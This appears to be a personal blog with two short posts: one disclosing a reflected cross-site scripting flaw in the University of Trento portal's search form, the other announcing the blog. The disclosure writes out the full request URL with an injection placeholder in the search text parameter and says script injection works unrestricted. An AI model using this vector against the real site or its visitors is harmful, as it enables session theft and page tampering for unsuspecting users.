unitn.it search-field XSS vulnerability

Playing around with firebug and hackbar I discovered a cross site scripting vulnerability in the University of Trento home page. Very simple but effective.

The exploit looks like this:

http://portale.unitn.it/scienze/search.do
?action_to_do=search_matching_values
&all=all
&cerca=Cerca
&channelId=-12827
&fast_search_radio=obj-search-quick-radio-unitn
&hidden_flag=hidden_flag
&page=/jsp/commonresultLucene.jsp
&pageToCall=show_all_people
&schInto=portal
&schOrder=orderRel
&schType=schAllWord
&search=
&text="<p/><_INJECTION_GOES_HERE_>

Javascript injection works without restrictions, and html injection of course too. So I build a simple exploit in honor of my friend Maurizio Grasso, take a look at it:

http://portale.unitn.it/scienze

I encourage all of you to install the "noscript" plugin for firefox, that blocks such an attack very easily.

Finally I got a blog

Hi all,
finally i put a personal blog online. I don't know yet what kind of information I will put there, but knowing that I'm a informatics enthusiast will give you some idea ;-)

Let us see how many times I will spend my limited free-time to write on this blog...

Important note: Sorry for my poor english.. I hope that would be better in the near future :-P